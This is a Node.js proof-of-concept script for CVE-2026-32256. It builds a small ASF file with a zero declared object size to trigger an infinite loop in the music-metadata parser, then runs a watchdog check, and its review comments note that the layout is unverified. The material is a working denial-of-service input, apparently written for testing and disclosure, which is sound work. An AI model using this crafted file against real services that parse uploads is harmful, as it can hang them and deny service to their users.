// PoC for CVE-2026-32256: music-metadata ASF parser infinite loop
// This PoC creates a malicious ASF file with objectSize = 0 to trigger the infinite loop in the parser
const fs = require('fs');
const { parseFile } = require('music-metadata');
// GUID of the top-level ASF Header Object, in on-disk byte order.
// The constant name says "file header"; it is the container object that
// opens the file, not the File Properties Object.
const ASF_FILE_HEADER_OBJECT = Buffer.from(
  '3026B2758E66CF11A6D900AA0062CE6C',
  'hex',
);

// Bytes this PoC uses as the Header Extension Object GUID.
// NOTE(review): not checked against the ASF specification or the parser's
// GUID table - confirm before relying on this fixture as a regression test.
const ASF_HEADER_EXTENSION_OBJECT = Buffer.from(
  '5BFBB7D74F7CCF11A8FD00805F5C442B',
  'hex',
);
/**
 * Writes the 48-byte test fixture to disk: the header GUID, a 64-bit
 * little-endian size equal to the total length written, the extension GUID,
 * and a 64-bit size of zero for that second object.
 *
 * NOTE(review): the layout has not been validated against the ASF
 * specification. If the parser rejects the file before it reaches the
 * zero-size object, a clean run says nothing about whether the installed
 * version is fixed - check the installed version against the advisory too.
 *
 * @param {string} filename - Path of the fixture file to create or overwrite.
 * @returns {void}
 */
function createMaliciousAsfFile(filename) {
  const GUID_LENGTH = 16;
  const SIZE_FIELD_LENGTH = 8;
  const totalLength = 2 * (GUID_LENGTH + SIZE_FIELD_LENGTH);

  // Encodes one object-size field as a signed 64-bit little-endian integer.
  const sizeField = (value) => {
    const field = Buffer.alloc(SIZE_FIELD_LENGTH);
    field.writeBigInt64LE(value);
    return field;
  };

  const fileBytes = Buffer.concat([
    ASF_FILE_HEADER_OBJECT,
    sizeField(BigInt(totalLength)),
    ASF_HEADER_EXTENSION_OBJECT,
    // Declared size of zero: the value the CVE description is about.
    sizeField(0n),
  ]);

  fs.writeFileSync(filename, fileBytes);
  console.log(`Malicious ASF file created: ${filename}`);
}
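// Main execution: build the fixture, then parse it under a watchdog timer.
const maliciousFile = 'poc_cve_2026_32256.asf';
createMaliciousAsfFile(maliciousFile);

// Attempt to parse (will cause infinite loop in vulnerable versions)
console.log('Attempting to parse malicious file...');
console.log('If the process hangs, the vulnerability is present.');

// Watchdog: report and exit non-zero if parsing has not settled in 5 seconds.
// A timer only fires while the event loop is free. If the parser's loop never
// yields, this callback cannot run and the process simply hangs, so also run
// the script under an external time limit (for example a CI job timeout).
const watchdog = setTimeout(() => {
  console.log('Parsing took too long - vulnerability confirmed!');
  process.exit(1);
}, 5000);

parseFile(maliciousFile)
  .then(() => console.log('Parsing completed'))
  .catch((err) => console.error('Error:', err))
  // Cancel the watchdog once parsing settles. Left armed, it would still fire
  // at 5 seconds and report "vulnerability confirmed" with exit code 1 even
  // when a fixed version returned or rejected the file promptly.
  .finally(() => clearTimeout(watchdog));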